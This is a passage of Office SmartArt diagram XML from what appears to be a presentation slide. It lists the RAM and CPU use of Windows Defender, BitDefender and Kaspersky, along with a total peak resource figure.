    <dgm:cxn modelId="{DC43C57B-F010-4913-BBDA-83803C6A31AE}" type="presParOf" srcId="{3B28A1EA-822C-4C30-8081-C7591D73E58E}" destId="{523A164B-A7F1-430C-B297-786D8E7BD7F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3E68645-D3FC-4517-9E59-DD121FCF2F0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185762-E45C-4D5C-9A9D-0A0AF53128D9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr b="1"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-GB" b="0"/>
            <a:t>Windows Defender</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t> (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" err="1"/>
            <a:t>SecurityHealth</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BF891B6E-F608-44DF-AE45-C823CCE90A98}" type="parTrans" cxnId="{A9AF66D4-D851-4D49-9532-DC5D66C85208}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE0E0AED-1302-44CF-9789-F2FF8ABD5FA2}" type="sibTrans" cxnId="{A9AF66D4-D851-4D49-9532-DC5D66C85208}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4CEAE96D-ECD7-43CA-B114-AD485E6DCDC1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB">
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>BitDefender</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B8EA4D02-1191-4668-B4C2-429949129E85}" type="parTrans" cxnId="{43EE4B13-735E-42D7-9AC9-6DB19CFE57FE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F4E279A3-4C63-475D-8230-EB7A2996F0D9}" type="sibTrans" cxnId="{43EE4B13-735E-42D7-9AC9-6DB19CFE57FE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4CFAF493-BBB9-4848-B47B-AB3592A9C249}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0">
            <a:defRPr b="1"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-GB" b="0"/>
            <a:t>4.5 MB RAM, ~0% CPU </a:t>
          </a:r>
          <a:endParaRPr lang="en-GB">
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DF3EC443-763E-42F8-BC6D-B52B4BAB943E}" type="parTrans" cxnId="{EF99AA2E-9DC2-4DDE-8F7D-CAD7C7FDCB60}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{28C3588A-44B7-4C54-B3AE-DCD5CA1BCFCA}" type="sibTrans" cxnId="{EF99AA2E-9DC2-4DDE-8F7D-CAD7C7FDCB60}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C02876A4-BE98-4EE2-8375-EFF61EE9037C}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-GB" b="0"/>
            <a:t>46 MB RAM, ~0.01% CPU</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" b="0">
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{922DF491-9C04-4D64-9409-CE4F74CAE9AD}" type="parTrans" cxnId="{011A38CF-B4B5-484A-A209-113D3A348525}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2D0A1A55-C0D7-46FF-AF7A-B01E14C8837A}" type="sibTrans" cxnId="{011A38CF-B4B5-484A-A209-113D3A348525}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{338296B1-DF17-40EC-8269-9FBADB2ED375}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" b="0">
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Kaspersky</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" b="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9449B4C-0ECD-4145-8A32-A1280F2A7938}" type="parTrans" cxnId="{539F72B4-4EAD-4419-A504-CBB3AFCF4873}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F211FCBB-419C-4EF9-B079-2DAB5C7066FC}" type="sibTrans" cxnId="{539F72B4-4EAD-4419-A504-CBB3AFCF4873}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E4FD72A-4072-4C53-A6F7-81069725DE5B}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-GB" b="0">
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>5.77</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" b="0"/>
            <a:t> % CPU,</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" b="0">
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t> 311</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" b="0"/>
            <a:t> MB RAM, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" b="0">
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>16.38 MB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" b="0"/>
            <a:t> I/O (during active capture)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF2974B3-CA21-4B6D-A69A-B7AF329649BF}" type="parTrans" cxnId="{7590C172-81F5-4656-B25F-6027BE687E2F}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{48CACF8E-F4F0-4227-BD8B-4BD8BD681681}" type="sibTrans" cxnId="{7590C172-81F5-4656-B25F-6027BE687E2F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65EA99EE-46B3-466C-8ACE-69F4DE489AF5}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" b="0"/>
            <a:t>   ~6% CPU, ~400 MB RAM, moderate I/O spikes</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3EA99AD1-0907-4F0B-9F7A-9AE94F316676}" type="parTrans" cxnId="{38C4BB74-4618-46E0-B8EF-ECE4533EF1F4}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{46A501F0-CB87-4A0E-8B6F-1577A7ECF366}" type="sibTrans" cxnId="{38C4BB74-4618-46E0-B8EF-ECE4533EF1F4}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EDD6B288-B11D-415E-A874-2C6B9AF25D6A}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-GB" b="0"/>
            <a:t>Total system resource impact (peak):  </a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" b="0">
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{68006E6F-4668-40F7-B069-7D954ADC36FF}" type="parTrans" cxnId="{098753DB-9E40-424C-8D55-EC47D08986FD}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6EE80132-0F53-42B3-8429-15368C90612D}" type="sibTrans" cxnId="{098753DB-9E40-424C-8D55-EC47D08986FD}">
      <dgm:prSet/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7D73C057-77B7-4D5F-9808-6A8C13EDB643}" type="pres">
      <dgm:prSet presAssocID="{C3E68645-D3FC-4517-9E59-DD121FCF2F05}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FEC24AE1-852D-4125-8D2E-D03771F333E0}" type="pres">
      <dgm:prSet presAssocID="{50185762-E45C-4D5C-9A9D-0A0AF53128D9}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7AE8A340-B22C-43FA-84DF-227889312CF4}" type="pres">
      <dgm:prSet presAssocID="{50185762-E45C-4D5C-9A9D-0A0AF53128D9}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{48F303FD-0654-4D4B-A8CB-4A45CA7E9C44}" type="pres">
      <dgm:prSet presAssocID="{50185762-E45C-4D5C-9A9D-0A0AF53128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98C2A0-8253-4C6F-8AF4-C3F323BEA6AD}" type="pres">
      <dgm:prSet presAssocID="{50185762-E45C-4D5C-9A9D-0A0AF53128D9}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6976635-BF20-4F73-B074-E8F8B33EDB36}" type="pres">
      <dgm:prSet presAssocID="{50185762-E45C-4D5C-9A9D-0A0AF53128D9}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8600F769-E825-47FD-A2DA-AC243F84C76A}" type="pres">
      <dgm:prSet presAssocID="{DE0E0AED-1302-44CF-9789-F2FF8ABD5FA2}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B9AF943A-64E2-4923-84AC-8C3DCAE428F7}" type="pres">
      <dgm:prSet presAssocID="{4CEAE96D-ECD7-43CA-B114-AD485E6DCDC1}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0F0E1BD8-B457-4324-AE88-A855FE7CE35B}" type="pres">
      <dgm:prSet presAssocID="{4CEAE96D-ECD7-43CA-B114-AD485E6DCDC1}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{65226CF2-E01E-48E1-9785-0337E60814BF}" type="pres">
      <dgm:prSet presAssocID="{4CEAE96D-ECD7-43CA-B114-AD485E6DCDC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72BADD-7DD7-4561-B609-5A412D6544CF}" type="pres">
      <dgm:prSet presAssocID="{4CEAE96D-ECD7-43CA-B114-AD485E6DCDC1}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BE980F8F-9B2C-4AEA-867A-42F5A6237F0E}" type="pres">
      <dgm:prSet presAssocID="{4CEAE96D-ECD7-43CA-B114-AD485E6DCDC1}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2505364C-D97F-4D66-962C-D6695E058140}" type="pres">
      <dgm:prSet presAssocID="{F4E279A3-4C63-475D-8230-EB7A2996F0D9}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E94ECCAC-D41C-4A41-B2AF-A100B81C5D95}" type="pres">
      <dgm:prSet presAssocID="{338296B1-DF17-40EC-8269-9FBADB2ED375}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F545DE11-F7A0-4C37-9B52-7C9C64FEE5E0}" type="pres">
      <dgm:prSet presAssocID="{338296B1-DF17-40EC-8269-9FBADB2ED375}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2DFF8794-1BEB-4BAE-AC36-DB12F1EFF036}" type="pres">
      <dgm:prSet presAssocID="{338296B1-DF17-40EC-8269-9FBADB2ED37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1A35B2C-D0B9-41BB-A545-0D2C7EB70267}" type="pres">
      <dgm:prSet presAssocID="{338296B1-DF17-40EC-8269-9FBADB2ED375}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{252BCE06-0926-4D6C-9114-08772B617AD5}" type="pres">
      <dgm:prSet presAssocID="{338296B1-DF17-40EC-8269-9FBADB2ED375}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F3D92D88-9CD2-46B8-8DDF-76F5104838EA}" type="pres">
      <dgm:prSet presAssocID="{F211FCBB-419C-4EF9-B079-2DAB5C7066FC}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D000E085-3547-4EC6-9CC4-84B22E2A94C9}" type="pres">
      <dgm:prSet presAssocID="{EDD6B288-B11D-415E-A874-2C6B9AF25D6A}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{09F991DB-6DEF-4BD5-B26B-CC0904B770A1}" type="pres">
      <dgm:prSet presAssocID="{EDD6B288-B11D-415E-A874-2C6B9AF25D6A}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{953F92B8-4E50-477C-BD43-BA7C150110A5}" type="pres">
      <dgm:prSet presAssocID="{EDD6B288-B11D-415E-A874-2C6B9AF25D6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6A77755-DE90-4BE1-B79F-45FDF6D7A0C9}" type="pres">
      <dgm:prSet presAssocID="{EDD6B288-B11D-415E-A874-2C6B9AF25D6A}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FE0723A4-A68F-4E35-9E13-C6F74ED92A2B}" type="pres">
      <dgm:prSet presAssocID="{EDD6B288-B11D-415E-A874-2C6B9AF25D6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0D92B09-F9F7-40B6-9149-6A5926AFA390}" type="presOf" srcId="{7E4FD72A-4072-4C53-A6F7-81069725DE5B}" destId="{252BCE06-0926-4D6C-9114-08772B617AD5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{43EE4B13-735E-42D7-9AC9-6DB19CFE57FE}" srcId="{C3E68645-D3FC-4517-9E59-DD121FCF2F05}" destId="{4CEAE96D-ECD7-43CA-B114-AD485E6DCDC1}" srcOrd="1" destOrd="0" parTransId="{B8EA4D02-1191-4668-B4C2-429949129E85}" sibTransId="{F4E279A3-4C63-475D-8230-EB7A2996F0D9}"/>
    <dgm:cxn modelId="{AEFC4919-B546-4DFE-B40C-69E4728E86D8}" type="presOf" srcId="{338296B1-DF17-40EC-8269-9FBADB2ED375}" destId="{F545DE11-F7A0-4C37-9B52-7C9C64FEE5E0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{EF99AA2E-9DC2-4DDE-8F7D-CAD7C7FDCB60}" srcId="{50185762-E45C-4D5C-9A9D-0A0AF53128D9}" destId="{4CFAF493-BBB9-4848-B47B-AB3592A9C249}" srcOrd="0" destOrd="0" parTransId="{DF3EC443-763E-42F8-BC6D-B52B4BAB943E}" sibTransId="{28C3588A-44B7-4C54-B3AE-DCD5CA1BCFCA}"/>
    <dgm:cxn modelId="{7590C172-81F5-4656-B25F-6027BE687E2F}" srcId="{338296B1-DF17-40EC-8269-9FBADB2ED375}" destId="{7E4FD72A-4072-4C53-A6F7-81069725DE5B}" srcOrd="0" destOrd="0" parTransId="{AF2974B3-CA21-4B6D-A69A-B7AF329649BF}" sibTransId="{48CACF8E-F4F0-4227-BD8B-4BD8BD681681}"/>
    <dgm:cxn modelId="{38C4BB74-4618-46E0-B8EF-ECE4533EF1F4}" srcId="{EDD6B288-B11D-415E-A874-2C6B9AF25D6A}" destId="{65EA99EE-46B3-466C-8ACE-69F4DE489AF5}" srcOrd="0" destOrd="0" parTransId="{3EA99AD1-0907-4F0B-9F7A-9AE94F316676}" sibTransId="{46A501F0-CB87-4A0E-8B6F-1577A7ECF366}"/>
    <dgm:cxn modelId="{BEDD2BA0-970F-46A0-AFAC-D02C6835D900}" type="presOf" srcId="{C3E68645-D3FC-4517-9E59-DD121FCF2F05}" destId="{7D73C057-77B7-4D5F-9808-6A8C13EDB643}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{F53DBEA9-AF9B-422D-9272-9364BF86C8AB}" type="presOf" srcId="{4CEAE96D-ECD7-43CA-B114-AD485E6DCDC1}" destId="{0F0E1BD8-B457-4324-AE88-A855FE7CE35B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{539F72B4-4EAD-4419-A504-CBB3AFCF4873}" srcId="{C3E68645-D3FC-4517-9E59-DD121FCF2F05}" destId="{338296B1-DF17-40EC-8269-9FBADB2ED375}" srcOrd="2" destOrd="0" parTransId="{B9449B4C-0ECD-4145-8A32-A1280F2A7938}" sibTransId="{F211FCBB-419C-4EF9-B079-2DAB5C7066FC}"/>
    <dgm:cxn modelId="{F49378B9-E0E9-40CF-ACC3-B479B8E3ED8C}" type="presOf" srcId="{C02876A4-BE98-4EE2-8375-EFF61EE9037C}" destId="{BE980F8F-9B2C-4AEA-867A-42F5A6237F0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{51EED7C4-B00B-44EB-AE99-F4A5D9D39E22}" type="presOf" srcId="{4CEAE96D-ECD7-43CA-B114-AD485E6DCDC1}" destId="{65226CF2-E01E-48E1-9785-0337E60814BF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C551FCCA-6978-4C7A-AD20-83475BEFB8EB}" type="presOf" srcId="{338296B1-DF17-40EC-8269-9FBADB2ED375}" destId="{2DFF8794-1BEB-4BAE-AC36-DB12F1EFF036}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{011A38CF-B4B5-484A-A209-113D3A348525}" srcId="{4CEAE96D-ECD7-43CA-B114-AD485E6DCDC1}" destId="{C02876A4-BE98-4EE2-8375-EFF61EE9037C}" srcOrd="0" destOrd="0" parTransId="{922DF491-9C04-4D64-9409-CE4F74CAE9AD}" sibTransId="{2D0A1A55-C0D7-46FF-AF7A-B01E14C8837A}"/>
    <dgm:cxn modelId="{50583CCF-E77E-47B8-90A1-D5D9CCF6A18D}" type="presOf" srcId="{65EA99EE-46B3-466C-8ACE-69F4DE489AF5}" destId="{FE0723A4-A68F-4E35-9E13-C6F74ED92A2B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A9AF66D4-D851-4D49-9532-DC5D66C85208}" srcId="{C3E68645-D3FC-4517-9E59-DD121FCF2F05}" destId="{50185762-E45C-4D5C-9A9D-0A0AF53128D9}" srcOrd="0" destOrd="0" parTransId="{BF891B6E-F608-44DF-AE45-C823CCE90A98}" sibTransId="{DE0E0AED-1302-44CF-9789-F2FF8ABD5FA2}"/>
    <dgm:cxn modelId="{098753DB-9E40-424C-8D55-EC47D08986FD}" srcId="{C3E68645-D3FC-4517-9E59-DD121FCF2F05}" destId="{EDD6B288-B11D-415E-A874-2C6B9AF25D6A}" srcOrd="3" destOrd="0" parTransId="{68006E6F-4668-40F7-B069-7D954ADC36FF}" sibTransId="{6EE80132-0F53-42B3-8429-15368C90612D}"/>
    <dgm:cxn modelId="{9BF5AEDC-1BDA-4435-8864-6177DE9598C4}" type="presOf" srcId="{50185762-E45C-4D5C-9A9D-0A0AF53128D9}" destId="{7AE8A340-B22C-43FA-84DF-227889312CF4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{279349DE-A9A2-430D-83D0-380EC7388E0F}" type="presOf" srcId="{EDD6B288-B11D-415E-A874-2C6B9AF25D6A}" destId="{953F92B8-4E50-477C-BD43-BA7C150110A5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BA0E94DF-13B6-4878-9FD5-7F5696745C67}" type="presOf" srcId="{50185762-E45C-4D5C-9A9D-0A0AF53128D9}" destId="{48F303FD-0654-4D4B-A8CB-4A45CA7E9C44}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{ADA014E6-646E-4E31-BA0A-A8D436D7ABBD}" type="presOf" srcId="{4CFAF493-BBB9-4848-B47B-AB3592A9C249}" destId="{D6976635-BF20-4F73-B074-E8F8B33EDB36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{9791C8E9-C057-442A-B468-690198D9F187}" type="presOf" srcId="{EDD6B288-B11D-415E-A874-2C6B9AF25D6A}" destId="{09F991DB-6DEF-4BD5-B26B-CC0904B770A1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4D1258DE-AFF6-4F6C-82A2-D1FF1A06CFB4}" type="presParOf" srcId="{7D73C057-77B7-4D5F-9808-6A8C13EDB643}" destId="{FEC24AE1-852D-4125-8D2E-D03771F333E0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B82E3655-B8E3-4D20-83FA-4DFA5226D0C5}" type="presParOf" srcId="{FEC24AE1-852D-4125-8D2E-D03771F333E0}" destId="{7AE8A340-B22C-43FA-84DF-227889312CF4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{92DCCAA4-35D9-4E19-9ABA-8709EC18AAA2}" type="presParOf" srcId="{FEC24AE1-852D-4125-8D2E-D03771F333E0}" destId="{48F303FD-0654-4D4B-A8CB-4A45CA7E9C44}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{35659570-1819-4745-89B2-EDBA49FF5C0C}" type="presParOf" srcId="{7D73C057-77B7-4D5F-9808-6A8C13EDB643}" destId="{0A98C2A0-8253-4C6F-8AF4-C3F323BEA6AD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8D3AA888-2F82-49F9-8968-E8085146E9B1}" type="presParOf" srcId="{7D73C057-77B7-4D5F-9808-6A8C13EDB643}" destId="{D6976635-BF20-4F73-B074-E8F8B33EDB36}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{47B71929-DEED-493A-AE61-A5139A93D0F3}" type="presParOf" srcId="{7D73C057-77B7-4D5F-9808-6A8C13EDB643}" destId="{8600F769-E825-47FD-A2DA-AC243F84C76A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{AD31CA14-60A7-40E4-82E9-4D02FA6FEEAB}" type="presParOf" srcId="{7D73C057-77B7-4D5F-9808-6A8C13EDB643}" destId="{B9AF943A-64E2-4923-84AC-8C3DCAE428F7}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5DD7DDF1-BCF0-43F5-9796-B41B222F74A1}" type="presParOf" srcId="{B9AF943A-64E2-4923-84AC-8C3DCAE428F7}" destId="{0F0E1BD8-B457-4324-AE88-A855FE7CE35B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{96EA48C7-6C90-459F-834E-234F76138DF3}" type="presParOf" srcId="{B9AF943A-64E2-4923-84AC-8C3DCAE428F7}" destId="{65226CF2-E01E-48E1-9785-0337E60814BF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6C75D8F1-358C-402A-8B92-E5E78863D685}" type="presParOf" srcId="{7D73C057-77B7-4D5F-9808-6A8C13EDB643}" destId="{B872BADD-7DD7-4561-B609-5A412D6544CF}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{0825B991-0A1D-4A67-9989-D85C9810418F}" type="presParOf" srcId="{7D73C057-77B7-4D5F-9808-6A8C13EDB643}" destId="{BE980F8F-9B2C-4AEA-867A-42F5A6237F0E}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1078E491-805C-4654-97E4-62626B653866}" type="presParOf" srcId="{7D73C057-77B7-4D5F-9808-6A8C13EDB643}" destId="{2505364C-D97F-4D66-962C-D6695E058140}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{030BBCB3-8914-4F21-9315-49E2F1F6E619}" type="presParOf" srcId="{7D73C057-77B7-4D5F-9808-6A8C13EDB643}" destId="{E94ECCAC-D41C-4A41-B2AF-A100B81C5D95}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4F7232E0-C4B8-46C1-9FC2-44A4550DEA0E}" type="presParOf" srcId="{E94ECCAC-D41C-4A41-B2AF-A100B81C5D95}" destId="{F545DE11-F7A0-4C37-9B52-7C9C64FEE5E0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{0E842939-E1E9-4D0B-BCBB-44B00A9D5C1C}" type="presParOf" srcId="{E94ECCAC-D41C-4A41-B2AF-A100B81C5D95}" destId="{2DFF8794-1BEB-4BAE-AC36-DB12F1EFF036}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
